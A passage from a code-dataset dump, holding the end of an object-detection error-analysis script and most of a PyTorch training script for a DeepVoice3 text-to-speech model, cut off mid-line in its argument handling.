all_info_sort[:n_most_conf]\n#print(all_info_sort)\n\ncorrect = 0\nmisloc = 0\nbackgr = 0\ncounter = 0\n\nfor el in all_info_sort:\n\n if el[\"label_p\"] == el[\"label_gt\"]:\n\n if el[\"iou_gt\"] < 0.3:\n backgr += 1\n elif el[\"iou_gt\"] >= 0.5:\n correct += 1\n else:\n misloc += 1\n else:\n backgr += 1\n\n counter += 1\n\nprint(f\"Correct detections: {(correct/counter)*100:.2f}%\")\nprint(f\"Mislocalization Error: {(misloc/counter)*100:.2f}%\")\nprint(f\"Background Error: {(backgr/counter)*100:.2f}%\")\nprint(counter)\n\n", "repo_name": "FrancescoCappio/DL_utils", "sub_path": "Object_detection_error_analysis/error_analysis_with_BoxList.py", "file_name": "error_analysis_with_BoxList.py", "file_ext": "py", "file_size_in_byte": 5879, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 73, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 126, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 126, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.structures.bounding_box.BoxList", "line_number": 140, "usage_type": "call"}]}
+{"seq_id": "40344938698", "text": "\"\"\"Trainining script for seq2seq text-to-speech synthesis model.\n\nusage: train.py [options]\n\noptions:\n --data-root= Directory contains preprocessed features.\n --checkpoint-dir= Directory where to save model checkpoints [default: checkpoints].\n --hparams= Hyper parameters [default: ].\n --preset= Path of preset parameters (json).\n --checkpoint= Restore model from checkpoint path if given.\n --checkpoint-seq2seq= Restore seq2seq model from checkpoint path.\n --checkpoint-postnet= Restore postnet model from checkpoint path.\n --train-seq2seq-only Train only seq2seq model.\n --train-postnet-only Train only postnet model.\n --restore-parts= Restore part of the model.\n --log-event-path= Log event path.\n --reset-optimizer Reset optimizer.\n --load-embedding= Load embedding from checkpoint.\n --speaker-id= Use specific speaker of data in case for multi-speaker datasets.\n -h, --help Show this help message and exit\n\"\"\"\nfrom docopt import docopt\n\nimport sys\nimport gc\nimport platform\nfrom os.path import dirname, join\nfrom tqdm import tqdm, trange\nfrom datetime import datetime\n\n# The deepvoice3 model\nfrom deepvoice3_pytorch import frontend, builder\nimport audio\nimport lrschedule\n\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.backends.cudnn as cudnn\nfrom torch.utils import data as data_utils\nfrom torch.utils.data.sampler import Sampler\nimport numpy as np\nfrom numba import jit\n\nfrom nnmnkwii.datasets import FileSourceDataset, FileDataSource\nfrom os.path import join, expanduser\nimport random\n\nimport librosa.display\nfrom matplotlib import pyplot as plt\nimport sys\nimport os\nfrom tensorboardX import SummaryWriter\nfrom matplotlib import cm\nfrom warnings import warn\nfrom hparams import hparams, hparams_debug_string\n\nglobal_step = 0\nglobal_epoch = 0\nuse_cuda = torch.cuda.is_available()\nif use_cuda:\n cudnn.benchmark = False\n\n_frontend = None # to be set later\n\n\ndef _pad(seq, max_len, constant_values=0):\n return np.pad(seq, (0, max_len - len(seq)),\n mode='constant', constant_values=constant_values)\n\n\ndef _pad_2d(x, max_len, b_pad=0):\n x = np.pad(x, [(b_pad, max_len - len(x) - b_pad), (0, 0)],\n mode=\"constant\", constant_values=0)\n return x\n\n\ndef plot_alignment(alignment, path, info=None):\n fig, ax = plt.subplots()\n im = ax.imshow(\n alignment,\n aspect='auto',\n origin='lower',\n interpolation='none')\n fig.colorbar(im, ax=ax)\n xlabel = 'Decoder timestep'\n if info is not None:\n xlabel += '\\n\\n' + info\n plt.xlabel(xlabel)\n plt.ylabel('Encoder timestep')\n plt.tight_layout()\n plt.savefig(path, format='png')\n plt.close()\n\n\nclass TextDataSource(FileDataSource):\n def __init__(self, data_root, speaker_id=None):\n self.data_root = data_root\n self.speaker_ids = None\n self.multi_speaker = False\n # If not None, filter by speaker_id\n self.speaker_id = speaker_id\n\n def collect_files(self):\n meta = join(self.data_root, \"train.txt\")\n with open(meta, \"rb\") as f:\n lines = f.readlines()\n l = lines[0].decode(\"utf-8\").split(\"|\")\n assert len(l) == 4 or len(l) == 5\n self.multi_speaker = len(l) == 5\n texts = list(map(lambda l: l.decode(\"utf-8\").split(\"|\")[3], lines))\n if self.multi_speaker:\n speaker_ids = list(map(lambda l: int(l.decode(\"utf-8\").split(\"|\")[-1]), lines))\n # Filter by speaker_id\n # using multi-speaker dataset as a single speaker dataset\n if self.speaker_id is not None:\n indices = np.array(speaker_ids) == self.speaker_id\n texts = list(np.array(texts)[indices])\n self.multi_speaker = False\n return texts\n\n return texts, speaker_ids\n else:\n return texts\n\n def collect_features(self, *args):\n if self.multi_speaker:\n text, speaker_id = args\n else:\n text = args[0]\n global _frontend\n if _frontend is None:\n _frontend = getattr(frontend, hparams.frontend)\n seq = _frontend.text_to_sequence(text, p=hparams.replace_pronunciation_prob)\n\n if platform.system() == \"Windows\":\n if hasattr(hparams, 'gc_probability'):\n _frontend = None # memory leaking prevention in Windows\n if np.random.rand() < hparams.gc_probability:\n gc.collect() # garbage collection enforced\n print(\"GC done\")\n\n if self.multi_speaker:\n return np.asarray(seq, dtype=np.int32), int(speaker_id)\n else:\n return np.asarray(seq, dtype=np.int32)\n\n\nclass _NPYDataSource(FileDataSource):\n def __init__(self, data_root, col, speaker_id=None):\n self.data_root = data_root\n self.col = col\n self.frame_lengths = []\n self.speaker_id = speaker_id\n\n def collect_files(self):\n meta = join(self.data_root, \"train.txt\")\n with open(meta, \"rb\") as f:\n lines = f.readlines()\n l = lines[0].decode(\"utf-8\").split(\"|\")\n assert len(l) == 4 or len(l) == 5\n multi_speaker = len(l) == 5\n self.frame_lengths = list(\n map(lambda l: int(l.decode(\"utf-8\").split(\"|\")[2]), lines))\n\n paths = list(map(lambda l: l.decode(\"utf-8\").split(\"|\")[self.col], lines))\n paths = list(map(lambda f: join(self.data_root, f), paths))\n\n if multi_speaker and self.speaker_id is not None:\n speaker_ids = list(map(lambda l: int(l.decode(\"utf-8\").split(\"|\")[-1]), lines))\n # Filter by speaker_id\n # using multi-speaker dataset as a single speaker dataset\n indices = np.array(speaker_ids) == self.speaker_id\n paths = list(np.array(paths)[indices])\n self.frame_lengths = list(np.array(self.frame_lengths)[indices])\n # aha, need to cast numpy.int64 to int\n self.frame_lengths = list(map(int, self.frame_lengths))\n\n return paths\n\n def collect_features(self, path):\n return np.load(path)\n\n\nclass MelSpecDataSource(_NPYDataSource):\n def __init__(self, data_root, speaker_id=None):\n super(MelSpecDataSource, self).__init__(data_root, 1, speaker_id)\n\n\nclass LinearSpecDataSource(_NPYDataSource):\n def __init__(self, data_root, speaker_id=None):\n super(LinearSpecDataSource, self).__init__(data_root, 0, speaker_id)\n\n\nclass PartialyRandomizedSimilarTimeLengthSampler(Sampler):\n \"\"\"Partially randmoized sampler\n\n 1. Sort by lengths\n 2. Pick a small patch and randomize it\n 3. Permutate mini-batchs\n \"\"\"\n\n def __init__(self, lengths, batch_size=16, batch_group_size=None,\n permutate=True):\n self.lengths, self.sorted_indices = torch.sort(torch.LongTensor(lengths))\n self.batch_size = batch_size\n if batch_group_size is None:\n batch_group_size = min(batch_size * 32, len(self.lengths))\n if batch_group_size % batch_size != 0:\n batch_group_size -= batch_group_size % batch_size\n\n self.batch_group_size = batch_group_size\n assert batch_group_size % batch_size == 0\n self.permutate = permutate\n\n def __iter__(self):\n indices = self.sorted_indices.clone()\n batch_group_size = self.batch_group_size\n s, e = 0, 0\n for i in range(len(indices) // batch_group_size):\n s = i * batch_group_size\n e = s + batch_group_size\n random.shuffle(indices[s:e])\n\n # Permutate batches\n if self.permutate:\n perm = np.arange(len(indices[:e]) // self.batch_size)\n random.shuffle(perm)\n indices[:e] = indices[:e].view(-1, self.batch_size)[perm, :].view(-1)\n\n # Handle last elements\n s += batch_group_size\n if s < len(indices):\n random.shuffle(indices[s:])\n\n return iter(indices)\n\n def __len__(self):\n return len(self.sorted_indices)\n\n\nclass PyTorchDataset(object):\n def __init__(self, X, Mel, Y):\n self.X = X\n self.Mel = Mel\n self.Y = Y\n # alias\n self.multi_speaker = X.file_data_source.multi_speaker\n\n def __getitem__(self, idx):\n if self.multi_speaker:\n text, speaker_id = self.X[idx]\n return text, self.Mel[idx], self.Y[idx], speaker_id\n else:\n return self.X[idx], self.Mel[idx], self.Y[idx]\n\n def __len__(self):\n return len(self.X)\n\n\ndef sequence_mask(sequence_length, max_len=None):\n if max_len is None:\n max_len = sequence_length.data.max()\n batch_size = sequence_length.size(0)\n seq_range = torch.arange(0, max_len).long()\n seq_range_expand = seq_range.unsqueeze(0).expand(batch_size, max_len)\n if sequence_length.is_cuda:\n seq_range_expand = seq_range_expand.cuda()\n seq_length_expand = sequence_length.unsqueeze(1) \\\n .expand_as(seq_range_expand)\n return (seq_range_expand < seq_length_expand).float()\n\n\nclass MaskedL1Loss(nn.Module):\n def __init__(self):\n super(MaskedL1Loss, self).__init__()\n self.criterion = nn.L1Loss(reduction=\"sum\")\n\n def forward(self, input, target, lengths=None, mask=None, max_len=None):\n if lengths is None and mask is None:\n raise RuntimeError(\"Should provide either lengths or mask\")\n\n # (B, T, 1)\n if mask is None:\n mask = sequence_mask(lengths, max_len).unsqueeze(-1)\n\n # (B, T, D)\n mask_ = mask.expand_as(input)\n loss = self.criterion(input * mask_, target * mask_)\n return loss / mask_.sum()\n\n\ndef collate_fn(batch):\n \"\"\"Create batch\"\"\"\n r = hparams.outputs_per_step\n downsample_step = hparams.downsample_step\n multi_speaker = len(batch[0]) == 4\n\n # Lengths\n input_lengths = [len(x[0]) for x in batch]\n max_input_len = max(input_lengths)\n\n target_lengths = [len(x[1]) for x in batch]\n\n max_target_len = max(target_lengths)\n if max_target_len % r != 0:\n max_target_len += r - max_target_len % r\n assert max_target_len % r == 0\n if max_target_len % downsample_step != 0:\n max_target_len += downsample_step - max_target_len % downsample_step\n assert max_target_len % downsample_step == 0\n\n # Set 0 for zero beginning padding\n # imitates initial decoder states\n b_pad = r\n max_target_len += b_pad * downsample_step\n\n a = np.array([_pad(x[0], max_input_len) for x in batch], dtype=np.int)\n x_batch = torch.LongTensor(a)\n\n input_lengths = torch.LongTensor(input_lengths)\n target_lengths = torch.LongTensor(target_lengths)\n\n b = np.array([_pad_2d(x[1], max_target_len, b_pad=b_pad) for x in batch],\n dtype=np.float32)\n mel_batch = torch.FloatTensor(b)\n\n c = np.array([_pad_2d(x[2], max_target_len, b_pad=b_pad) for x in batch],\n dtype=np.float32)\n y_batch = torch.FloatTensor(c)\n\n # text positions\n text_positions = np.array([_pad(np.arange(1, len(x[0]) + 1), max_input_len)\n for x in batch], dtype=np.int)\n text_positions = torch.LongTensor(text_positions)\n\n max_decoder_target_len = max_target_len // r // downsample_step\n\n # frame positions\n s, e = 1, max_decoder_target_len + 1\n # if b_pad > 0:\n # s, e = s - 1, e - 1\n # NOTE: needs clone to supress RuntimeError in dataloarder...\n # ref: https://github.com/pytorch/pytorch/issues/10756\n frame_positions = torch.arange(s, e).long().unsqueeze(0).expand(\n len(batch), max_decoder_target_len).clone()\n\n # done flags\n done = np.array([_pad(np.zeros(len(x[1]) // r // downsample_step - 1),\n max_decoder_target_len, constant_values=1)\n for x in batch])\n done = torch.FloatTensor(done).unsqueeze(-1)\n\n if multi_speaker:\n speaker_ids = torch.LongTensor([x[3] for x in batch])\n else:\n speaker_ids = None\n\n return x_batch, input_lengths, mel_batch, y_batch, \\\n (text_positions, frame_positions), done, target_lengths, speaker_ids\n\n\ndef time_string():\n return datetime.now().strftime('%Y-%m-%d %H:%M')\n\n\ndef save_alignment(path, attn):\n plot_alignment(attn.T, path, info=\"{}, {}, step={}\".format(\n hparams.builder, time_string(), global_step))\n\n\ndef prepare_spec_image(spectrogram):\n # [0, 1]\n spectrogram = (spectrogram - np.min(spectrogram)) / (np.max(spectrogram) - np.min(spectrogram))\n spectrogram = np.flip(spectrogram, axis=1) # flip against freq axis\n return np.uint8(cm.magma(spectrogram.T) * 255)\n\n\ndef eval_model(global_step, writer, device, model, checkpoint_dir, ismultispeaker):\n # harded coded\n texts = [\n \"Scientists at the CERN laboratory say they have discovered a new particle.\",\n \"There's a way to measure the acute emotional intelligence that has never gone out of style.\",\n \"President Trump met with other leaders at the Group of 20 conference.\",\n \"Generative adversarial network or variational auto-encoder.\",\n \"Please call Stella.\",\n \"Some have accepted this as a miracle without any physical explanation.\",\n ]\n import synthesis\n synthesis._frontend = _frontend\n\n eval_output_dir = join(checkpoint_dir, \"eval\")\n os.makedirs(eval_output_dir, exist_ok=True)\n\n # Prepare model for evaluation\n model_eval = build_model().to(device)\n model_eval.load_state_dict(model.state_dict())\n\n # hard coded\n speaker_ids = [0, 1, hparams.n_speakers-1] if ismultispeaker else [None]\n for speaker_id in speaker_ids:\n speaker_str = \"multispeaker{}\".format(speaker_id) if speaker_id is not None else \"single\"\n\n for idx, text in enumerate(texts):\n signal, alignment, _, mel = synthesis.tts(\n model_eval, text, p=0, speaker_id=speaker_id, fast=True)\n signal /= np.max(np.abs(signal))\n\n # Alignment\n path = join(eval_output_dir, \"step{:09d}_text{}_{}_alignment.png\".format(\n global_step, idx, speaker_str))\n save_alignment(path, alignment)\n tag = \"eval_averaged_alignment_{}_{}\".format(idx, speaker_str)\n try:\n writer.add_image(tag, np.uint8(cm.viridis(np.flip(alignment, 1).T) * 255), global_step)\n except Exception as e:\n warn(str(e))\n\n # Mel\n try:\n writer.add_image(\"(Eval) Predicted mel spectrogram text{}_{}\".format(idx, speaker_str),\n prepare_spec_image(mel), global_step)\n except Exception as e:\n warn(str(e))\n\n # Audio\n path = join(eval_output_dir, \"step{:09d}_text{}_{}_predicted.wav\".format(\n global_step, idx, speaker_str))\n audio.save_wav(signal, path)\n\n try:\n writer.add_audio(\"(Eval) Predicted audio signal {}_{}\".format(idx, speaker_str),\n signal, global_step, sample_rate=hparams.sample_rate)\n except Exception as e:\n warn(str(e))\n pass\n\n\ndef save_states(global_step, writer, mel_outputs, linear_outputs, attn, mel, y,\n input_lengths, checkpoint_dir=None):\n print(\"Save intermediate states at step {}\".format(global_step))\n\n # idx = np.random.randint(0, len(input_lengths))\n idx = min(1, len(input_lengths) - 1)\n input_length = input_lengths[idx]\n\n # Alignment\n # Multi-hop attention\n if attn is not None and attn.dim() == 4:\n for i, alignment in enumerate(attn):\n alignment = alignment[idx].cpu().data.numpy()\n tag = \"alignment_layer{}\".format(i + 1)\n try:\n writer.add_image(tag, np.uint8(cm.viridis(\n np.flip(alignment, 1).T) * 255), global_step)\n # save files as well for now\n alignment_dir = join(\n checkpoint_dir, \"alignment_layer{}\".format(i + 1))\n os.makedirs(alignment_dir, exist_ok=True)\n path = join(alignment_dir, \"step{:09d}_layer_{}_alignment.png\".format(\n global_step, i + 1))\n save_alignment(path, alignment)\n except Exception as e:\n warn(str(e))\n\n # Save averaged alignment\n alignment_dir = join(checkpoint_dir, \"alignment_ave\")\n os.makedirs(alignment_dir, exist_ok=True)\n path = join(alignment_dir, \"step{:09d}_layer_alignment.png\".format(global_step))\n alignment = attn.mean(0)[idx].cpu().data.numpy()\n save_alignment(path, alignment)\n tag = \"averaged_alignment\"\n\n try:\n writer.add_image(tag, np.uint8(cm.viridis(\n np.flip(alignment, 1).T) * 255), global_step)\n except Exception as e:\n warn(str(e))\n\n # Predicted mel spectrogram\n if mel_outputs is not None:\n mel_output = mel_outputs[idx].cpu().data.numpy()\n mel_output = prepare_spec_image(audio._denormalize(mel_output))\n try:\n writer.add_image(\"Predicted mel spectrogram\",\n mel_output, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n # Predicted spectrogram\n if linear_outputs is not None:\n linear_output = linear_outputs[idx].cpu().data.numpy()\n spectrogram = prepare_spec_image(audio._denormalize(linear_output))\n try:\n writer.add_image(\"Predicted linear spectrogram\",\n spectrogram, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n # Predicted audio signal\n signal = audio.inv_spectrogram(linear_output.T)\n signal /= np.max(np.abs(signal))\n path = join(checkpoint_dir, \"step{:09d}_predicted.wav\".format(\n global_step))\n try:\n writer.add_audio(\"Predicted audio signal\", signal,\n global_step, sample_rate=hparams.sample_rate)\n except Exception as e:\n warn(str(e))\n pass\n audio.save_wav(signal, path)\n\n # Target mel spectrogram\n if mel_outputs is not None:\n mel_output = mel[idx].cpu().data.numpy()\n mel_output = prepare_spec_image(audio._denormalize(mel_output))\n try:\n writer.add_image(\"Target mel spectrogram\", mel_output, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n # Target spectrogram\n if linear_outputs is not None:\n linear_output = y[idx].cpu().data.numpy()\n spectrogram = prepare_spec_image(audio._denormalize(linear_output))\n try:\n writer.add_image(\"Target linear spectrogram\",\n spectrogram, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n\ndef logit(x, eps=1e-8):\n return torch.log(x + eps) - torch.log(1 - x + eps)\n\n\ndef masked_mean(y, mask):\n # (B, T, D)\n mask_ = mask.expand_as(y)\n return (y * mask_).sum() / mask_.sum()\n\n\ndef spec_loss(y_hat, y, mask, priority_bin=None, priority_w=0):\n masked_l1 = MaskedL1Loss()\n l1 = nn.L1Loss()\n\n w = hparams.masked_loss_weight\n\n # L1 loss\n if w > 0:\n assert mask is not None\n l1_loss = w * masked_l1(y_hat, y, mask=mask) + (1 - w) * l1(y_hat, y)\n else:\n assert mask is None\n l1_loss = l1(y_hat, y)\n\n # Priority L1 loss\n if priority_bin is not None and priority_w > 0:\n if w > 0:\n priority_loss = w * masked_l1(\n y_hat[:, :, :priority_bin], y[:, :, :priority_bin], mask=mask) \\\n + (1 - w) * l1(y_hat[:, :, :priority_bin], y[:, :, :priority_bin])\n else:\n priority_loss = l1(y_hat[:, :, :priority_bin], y[:, :, :priority_bin])\n l1_loss = (1 - priority_w) * l1_loss + priority_w * priority_loss\n\n # Binary divergence loss\n if hparams.binary_divergence_weight <= 0:\n binary_div = y.data.new(1).zero_()\n else:\n y_hat_logits = logit(y_hat)\n z = -y * y_hat_logits + torch.log1p(torch.exp(y_hat_logits))\n if w > 0:\n binary_div = w * masked_mean(z, mask) + (1 - w) * z.mean()\n else:\n binary_div = z.mean()\n\n return l1_loss, binary_div\n\n\n@jit(nopython=True)\ndef guided_attention(N, max_N, T, max_T, g):\n W = np.zeros((max_N, max_T), dtype=np.float32)\n for n in range(N):\n for t in range(T):\n W[n, t] = 1 - np.exp(-(n / N - t / T)**2 / (2 * g * g))\n return W\n\n\ndef guided_attentions(input_lengths, target_lengths, max_target_len, g=0.2):\n B = len(input_lengths)\n max_input_len = input_lengths.max()\n W = np.zeros((B, max_target_len, max_input_len), dtype=np.float32)\n for b in range(B):\n W[b] = guided_attention(input_lengths[b], max_input_len,\n target_lengths[b], max_target_len, g).T\n return W\n\n\ndef train(device, model, data_loader, optimizer, writer,\n init_lr=0.002,\n checkpoint_dir=None, checkpoint_interval=None, nepochs=None,\n clip_thresh=1.0,\n train_seq2seq=True, train_postnet=True):\n linear_dim = model.linear_dim\n r = hparams.outputs_per_step\n downsample_step = hparams.downsample_step\n current_lr = init_lr\n\n binary_criterion = nn.BCELoss()\n\n assert train_seq2seq or train_postnet\n\n global global_step, global_epoch\n while global_epoch < nepochs:\n running_loss = 0.\n for step, (x, input_lengths, mel, y, positions, done, target_lengths,\n speaker_ids) \\\n in tqdm(enumerate(data_loader)):\n model.train()\n ismultispeaker = speaker_ids is not None\n # Learning rate schedule\n if hparams.lr_schedule is not None:\n lr_schedule_f = getattr(lrschedule, hparams.lr_schedule)\n current_lr = lr_schedule_f(\n init_lr, global_step, **hparams.lr_schedule_kwargs)\n for param_group in optimizer.param_groups:\n param_group['lr'] = current_lr\n optimizer.zero_grad()\n\n # Used for Position encoding\n text_positions, frame_positions = positions\n\n # Downsample mel spectrogram\n if downsample_step > 1:\n mel = mel[:, 0::downsample_step, :].contiguous()\n\n # Lengths\n input_lengths = input_lengths.long().numpy()\n decoder_lengths = target_lengths.long().numpy() // r // downsample_step\n\n max_seq_len = max(input_lengths.max(), decoder_lengths.max())\n if max_seq_len >= hparams.max_positions:\n raise RuntimeError(\n \"\"\"max_seq_len ({}) >= max_posision ({})\nInput text or decoder targget length exceeded the maximum length.\nPlease set a larger value for ``max_position`` in hyper parameters.\"\"\".format(\n max_seq_len, hparams.max_positions))\n\n # Transform data to CUDA device\n if train_seq2seq:\n x = x.to(device)\n text_positions = text_positions.to(device)\n frame_positions = frame_positions.to(device)\n if train_postnet:\n y = y.to(device)\n mel, done = mel.to(device), done.to(device)\n target_lengths = target_lengths.to(device)\n speaker_ids = speaker_ids.to(device) if ismultispeaker else None\n\n # Create mask if we use masked loss\n if hparams.masked_loss_weight > 0:\n # decoder output domain mask\n decoder_target_mask = sequence_mask(\n target_lengths // (r * downsample_step),\n max_len=mel.size(1)).unsqueeze(-1)\n if downsample_step > 1:\n # spectrogram-domain mask\n target_mask = sequence_mask(\n target_lengths, max_len=y.size(1)).unsqueeze(-1)\n else:\n target_mask = decoder_target_mask\n # shift mask\n decoder_target_mask = decoder_target_mask[:, r:, :]\n target_mask = target_mask[:, r:, :]\n else:\n decoder_target_mask, target_mask = None, None\n\n # Apply model\n if train_seq2seq and train_postnet:\n mel_outputs, linear_outputs, attn, done_hat = model(\n x, mel, speaker_ids=speaker_ids,\n text_positions=text_positions, frame_positions=frame_positions,\n input_lengths=input_lengths)\n elif train_seq2seq:\n assert speaker_ids is None\n mel_outputs, attn, done_hat, _ = model.seq2seq(\n x, mel,\n text_positions=text_positions, frame_positions=frame_positions,\n input_lengths=input_lengths)\n # reshape\n mel_outputs = mel_outputs.view(len(mel), -1, mel.size(-1))\n linear_outputs = None\n elif train_postnet:\n assert speaker_ids is None\n linear_outputs = model.postnet(mel)\n mel_outputs, attn, done_hat = None, None, None\n\n # Losses\n w = hparams.binary_divergence_weight\n\n # mel:\n if train_seq2seq:\n mel_l1_loss, mel_binary_div = spec_loss(\n mel_outputs[:, :-r, :], mel[:, r:, :], decoder_target_mask)\n mel_loss = (1 - w) * mel_l1_loss + w * mel_binary_div\n\n # done:\n if train_seq2seq:\n done_loss = binary_criterion(done_hat, done)\n\n # linear:\n if train_postnet:\n n_priority_freq = int(hparams.priority_freq / (hparams.sample_rate * 0.5) * linear_dim)\n linear_l1_loss, linear_binary_div = spec_loss(\n linear_outputs[:, :-r, :], y[:, r:, :], target_mask,\n priority_bin=n_priority_freq,\n priority_w=hparams.priority_freq_weight)\n linear_loss = (1 - w) * linear_l1_loss + w * linear_binary_div\n\n # Combine losses\n if train_seq2seq and train_postnet:\n loss = mel_loss + linear_loss + done_loss\n elif train_seq2seq:\n loss = mel_loss + done_loss\n elif train_postnet:\n loss = linear_loss\n\n # attention\n if train_seq2seq and hparams.use_guided_attention:\n soft_mask = guided_attentions(input_lengths, decoder_lengths,\n attn.size(-2),\n g=hparams.guided_attention_sigma)\n soft_mask = torch.from_numpy(soft_mask).to(device)\n attn_loss = (attn * soft_mask).mean()\n loss += attn_loss\n\n if global_step > 0 and global_step % checkpoint_interval == 0:\n save_states(\n global_step, writer, mel_outputs, linear_outputs, attn,\n mel, y, input_lengths, checkpoint_dir)\n save_checkpoint(\n model, optimizer, global_step, checkpoint_dir, global_epoch,\n train_seq2seq, train_postnet)\n\n if global_step > 0 and global_step % hparams.eval_interval == 0:\n eval_model(global_step, writer, device, model,\n checkpoint_dir, ismultispeaker)\n\n # Update\n loss.backward()\n if clip_thresh > 0:\n grad_norm = torch.nn.utils.clip_grad_norm_(\n model.get_trainable_parameters(), clip_thresh)\n optimizer.step()\n\n # Logs\n writer.add_scalar(\"loss\", float(loss.item()), global_step)\n if train_seq2seq:\n writer.add_scalar(\"done_loss\", float(done_loss.item()), global_step)\n writer.add_scalar(\"mel loss\", float(mel_loss.item()), global_step)\n writer.add_scalar(\"mel_l1_loss\", float(mel_l1_loss.item()), global_step)\n writer.add_scalar(\"mel_binary_div_loss\", float(mel_binary_div.item()), global_step)\n if train_postnet:\n writer.add_scalar(\"linear_loss\", float(linear_loss.item()), global_step)\n writer.add_scalar(\"linear_l1_loss\", float(linear_l1_loss.item()), global_step)\n writer.add_scalar(\"linear_binary_div_loss\", float(linear_binary_div.item()), global_step)\n if train_seq2seq and hparams.use_guided_attention:\n writer.add_scalar(\"attn_loss\", float(attn_loss.item()), global_step)\n if clip_thresh > 0:\n writer.add_scalar(\"gradient norm\", grad_norm, global_step)\n writer.add_scalar(\"learning rate\", current_lr, global_step)\n\n global_step += 1\n running_loss += loss.item()\n\n averaged_loss = running_loss / (len(data_loader))\n writer.add_scalar(\"loss (per epoch)\", averaged_loss, global_epoch)\n print(\"Loss: {}\".format(running_loss / (len(data_loader))))\n\n global_epoch += 1\n\n\ndef save_checkpoint(model, optimizer, step, checkpoint_dir, epoch,\n train_seq2seq, train_postnet):\n if train_seq2seq and train_postnet:\n suffix = \"\"\n m = model\n elif train_seq2seq:\n suffix = \"_seq2seq\"\n m = model.seq2seq\n elif train_postnet:\n suffix = \"_postnet\"\n m = model.postnet\n\n checkpoint_path = join(\n checkpoint_dir, \"checkpoint_step{:09d}{}.pth\".format(global_step, suffix))\n optimizer_state = optimizer.state_dict() if hparams.save_optimizer_state else None\n torch.save({\n \"state_dict\": m.state_dict(),\n \"optimizer\": optimizer_state,\n \"global_step\": step,\n \"global_epoch\": epoch,\n }, checkpoint_path)\n print(\"Saved checkpoint:\", checkpoint_path)\n\n\ndef build_model():\n model = getattr(builder, hparams.builder)(\n n_speakers=hparams.n_speakers,\n speaker_embed_dim=hparams.speaker_embed_dim,\n n_vocab=_frontend.n_vocab,\n embed_dim=hparams.text_embed_dim,\n mel_dim=hparams.num_mels,\n linear_dim=hparams.fft_size // 2 + 1,\n r=hparams.outputs_per_step,\n downsample_step=hparams.downsample_step,\n padding_idx=hparams.padding_idx,\n dropout=hparams.dropout,\n kernel_size=hparams.kernel_size,\n encoder_channels=hparams.encoder_channels,\n decoder_channels=hparams.decoder_channels,\n converter_channels=hparams.converter_channels,\n use_memory_mask=hparams.use_memory_mask,\n trainable_positional_encodings=hparams.trainable_positional_encodings,\n force_monotonic_attention=hparams.force_monotonic_attention,\n use_decoder_state_for_postnet_input=hparams.use_decoder_state_for_postnet_input,\n max_positions=hparams.max_positions,\n speaker_embedding_weight_std=hparams.speaker_embedding_weight_std,\n freeze_embedding=hparams.freeze_embedding,\n window_ahead=hparams.window_ahead,\n window_backward=hparams.window_backward,\n key_projection=hparams.key_projection,\n value_projection=hparams.value_projection,\n )\n return model\n\n\ndef _load(checkpoint_path):\n if use_cuda:\n checkpoint = torch.load(checkpoint_path)\n else:\n checkpoint = torch.load(checkpoint_path,\n map_location=lambda storage, loc: storage)\n return checkpoint\n\n\ndef load_checkpoint(path, model, optimizer, reset_optimizer):\n global global_step\n global global_epoch\n\n print(\"Load checkpoint from: {}\".format(path))\n checkpoint = _load(path)\n model.load_state_dict(checkpoint[\"state_dict\"])\n if not reset_optimizer:\n optimizer_state = checkpoint[\"optimizer\"]\n if optimizer_state is not None:\n print(\"Load optimizer state from {}\".format(path))\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n global_step = checkpoint[\"global_step\"]\n global_epoch = checkpoint[\"global_epoch\"]\n\n return model\n\n\ndef _load_embedding(path, model):\n state = _load(path)[\"state_dict\"]\n key = \"seq2seq.encoder.embed_tokens.weight\"\n model.seq2seq.encoder.embed_tokens.weight.data = state[key]\n\n# https://discuss.pytorch.org/t/how-to-load-part-of-pre-trained-model/1113/3\n\n\ndef restore_parts(path, model):\n print(\"Restore part of the model from: {}\".format(path))\n state = _load(path)[\"state_dict\"]\n model_dict = model.state_dict()\n valid_state_dict = {k: v for k, v in state.items() if k in model_dict}\n\n try:\n model_dict.update(valid_state_dict)\n model.load_state_dict(model_dict)\n except RuntimeError as e:\n # there should be invalid size of weight(s), so load them per parameter\n print(str(e))\n model_dict = model.state_dict()\n for k, v in valid_state_dict.items():\n model_dict[k] = v\n try:\n model.load_state_dict(model_dict)\n except RuntimeError as e:\n print(str(e))\n warn(\"{}: may contain invalid size of weight. skipping...\".format(k))\n\n\nif __name__ == \"__main__\":\n args = docopt(__doc__)\n print(\"Command line args:\\n\", args)\n checkpoint_dir = args[\"--checkpoint-dir\"]\n checkpoint_path = args[\"--checkpoint\"]\n checkpoint_seq2seq_path = args[\"--checkpoint-seq2seq\"]\n checkpoint_postnet_path = args[\"--checkpoint-postnet\"]\n load_embedding = args[\"--load-embedding\"]\n checkpoint_restore_parts = args[\"--restore-parts\"]\n speaker_id = args[\"--speaker-id\"]\n speaker_id = int(speaker_id) if speaker_id is not None else None\n preset = args[\"--preset\"]\n\n data_root = args[\"--data-root\"]\n if data_root is None:\n data_root = join(dirname(__file__), \"data\", \"ljspeech\")\n\n log_event_path = args[\"--log-event-path\"]\n reset_optimizer = args[\"--reset-optimizer\"]\n\n # Which model to be trained\n train_seq2seq = args[\"--train-seq2seq-only\"]\n train_postnet = args[\"--train-postnet-only\"]\n # train both if not specified\n if not train_seq2seq and not train_postnet:\n print(\"Training whole model\")\n train_seq2seq, train_postnet = True, True\n if train_seq2seq:\n print(\"Training seq2seq model\")\n elif train_postnet:\n print(\"Training postnet model\")\n else:\n assert False, \"must be 